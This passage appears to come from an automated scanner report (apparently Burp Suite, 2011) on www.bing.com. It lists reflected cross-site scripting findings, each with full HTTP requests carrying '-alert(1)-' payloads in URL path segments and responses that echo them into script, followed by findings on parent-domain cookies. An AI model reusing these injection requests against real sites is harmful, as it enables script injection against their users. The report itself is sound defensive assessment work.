This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/usc0e7a'-alert(1)-'5e1b01ee50d/co/colorado%20springs/?&form=llsv HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/locationselector.aspx?where=aa461'-alert(String.fromCharCode(88%2c83%2c83))-'6f0e1fe887b&FORM=LLSV
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: f45d0c4dc6324e2182df53bb640e93db
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:39:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/usc0e7a'-alert(1)-'5e1b01ee50d/co/colorado%20springs
Content-Length: 17663


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
or3,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/usc0e7a'-alert(1)-'5e1b01ee50d/co/colorado%20springs';</script>
...[SNIP]...

1.16. http://www.bing.com/local/us/co/colorado%20springs/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/co/colorado%20springs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f22a'-alert(1)-'3bd3709716f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/us/co8f22a'-alert(1)-'3bd3709716f/colorado%20springs/?&form=llsv HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/locationselector.aspx?where=aa461'-alert(String.fromCharCode(88%2c83%2c83))-'6f0e1fe887b&FORM=LLSV
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 07c752f71e304cce9279a1b3c3465058
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001201
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:39:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/co8f22a'-alert(1)-'3bd3709716f/colorado%20springs
Content-Length: 17663


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/us/co8f22a'-alert(1)-'3bd3709716f/colorado%20springs';</script>
...[SNIP]...

1.17. http://www.bing.com/local/us/co/colorado%20springs/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/co/colorado%20springs/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32486'-alert(1)-'db160d7cb9d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/us/co/colorado%20springs32486'-alert(1)-'db160d7cb9d/?&form=llsv HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/locationselector.aspx?where=aa461'-alert(String.fromCharCode(88%2c83%2c83))-'6f0e1fe887b&FORM=LLSV
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: c296aefe178d45a1a5efca099d7e0fa0
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001210
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:39:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/co/colorado%20springs32486'-alert(1)-'db160d7cb9d
Content-Length: 17663


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
indow.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/us/co/colorado%20springs32486'-alert(1)-'db160d7cb9d';</script>
...[SNIP]...

1.18. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/dc/washington/restaurants/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bca9'-alert(1)-'895eb8d0830 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/us3bca9'-alert(1)-'895eb8d0830/dc/washington/restaurants/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 268015315b3445d49efb1994e1f301c5
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001202
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:39:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us3bca9'-alert(1)-'895eb8d0830/dc/washington/restaurants
Content-Length: 18033


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
or3,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/us3bca9'-alert(1)-'895eb8d0830/dc/washington/restaurants';</script>
...[SNIP]...

1.19. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/dc/washington/restaurants/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1def'-alert(1)-'6b7319ebc1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/us/dce1def'-alert(1)-'6b7319ebc1e/washington/restaurants/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 7be42ec4956a469b82538dfc06674d05
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:39:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/dce1def'-alert(1)-'6b7319ebc1e/washington/restaurants
Content-Length: 18033


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/us/dce1def'-alert(1)-'6b7319ebc1e/washington/restaurants';</script>
...[SNIP]...

1.20. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/dc/washington/restaurants/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b6eb'-alert(1)-'49a7dfafb56 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/us/dc/washington4b6eb'-alert(1)-'49a7dfafb56/restaurants/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 8b0963cd534b4e8bbbbd7e985c9c8ac5
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001210
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:39:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/dc/washington4b6eb'-alert(1)-'49a7dfafb56/restaurants
Content-Length: 18061


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
ion=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/us/dc/washington4b6eb'-alert(1)-'49a7dfafb56/restaurants';</script>
...[SNIP]...

1.21. http://www.bing.com/local/us/dc/washington/restaurants/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/dc/washington/restaurants/

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8e13'-alert(1)-'2806c252a89 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 12 Feb 2011 00:39:28 GMT
Last-Modified: Fri, 11 Feb 2011 22:39:28 GMT
X-BM-TraceID: 976c295f755a460eb8f3f999f06169eb
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001203
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:39:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89
Content-Length: 81503


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
w.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89';</script>
...[SNIP]...

1.22. http://www.bing.com/local/ypdefault.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/ypdefault.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa461'-alert(1)-'6f0e1fe887b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/aa461'-alert(1)-'6f0e1fe887b HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 231a18c4916c4b70a646d63a7545364f
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001206
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BID=427de311063243808728d41ec43d59cd; path=/local/aa461'-alert(1)-'6f0e1fe887b
Set-Cookie: CID=1764362dd5d54f5d804b3eac8f7488c9; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local/aa461'-alert(1)-'6f0e1fe887b
Set-Cookie: CDate=2/11/2011 9:46:28 PM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local/aa461'-alert(1)-'6f0e1fe887b
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(1)-'6f0e1fe887b
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:28 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=004F0C3CA2F24A41856FA89F6160974C; domain=.bing.com; path=/
Content-Length: 29347


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
e=or3,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/aa461'-alert(1)-'6f0e1fe887b';</script>
...[SNIP]...

2. Cookie scoped to parent domain
There are 33 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


2.1. http://www.bing.com/travel/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lbc=819; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z4gm3vtmq19cv3yz780quprn4otsl_VID-z1oq4m4dn99d87yz72fovekggbn1v_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:12 GMT; Path=/travel
Set-Cookie: JSESSIONID=2C453B42A8BD6A784D623C2DF0E8BB7A; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:12 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3F8AAA80A722410C8B09878099EDA1CA; domain=.bing.com; path=/
Content-Length: 87698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

2.2. http://www.bing.com/travel/deals/cheap-flights-to-los-angeles.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/deals/cheap-flights-to-los-angeles.do

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/cheap-flights-to-los-angeles.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lbc=10; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-3n2vnipb2oiulyz4dk98nomu7t6s_VID-2999kjki8gjlyz46o65lm9u4oc6_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:33 GMT; Path=/travel
Set-Cookie: JSESSIONID=A0A8F410795893A332A965C69339FF7E; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:34 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3FA678BC8CC54FFDB405305453C54626; domain=.bing.com; path=/
Content-Length: 134700

